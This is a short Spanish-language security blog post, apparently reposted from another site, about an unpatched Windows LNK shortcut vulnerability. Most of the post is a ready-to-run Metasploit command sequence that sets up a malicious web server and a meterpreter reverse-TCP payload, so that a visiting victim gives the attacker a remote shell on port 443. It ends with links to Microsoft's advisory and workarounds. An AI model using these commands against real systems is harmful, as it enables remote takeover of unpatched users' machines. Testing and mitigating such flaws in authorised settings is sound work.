MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con «svn update», y luego hacemos lo siguiente:
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit
De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
Microsoft Security Advisory (2286198)
– Security By Default: Solución a la vulnerabilidad «LNK» de Windows mediante Directivas de Restricción de Software
Fuente: http://www.kungfoosion.com/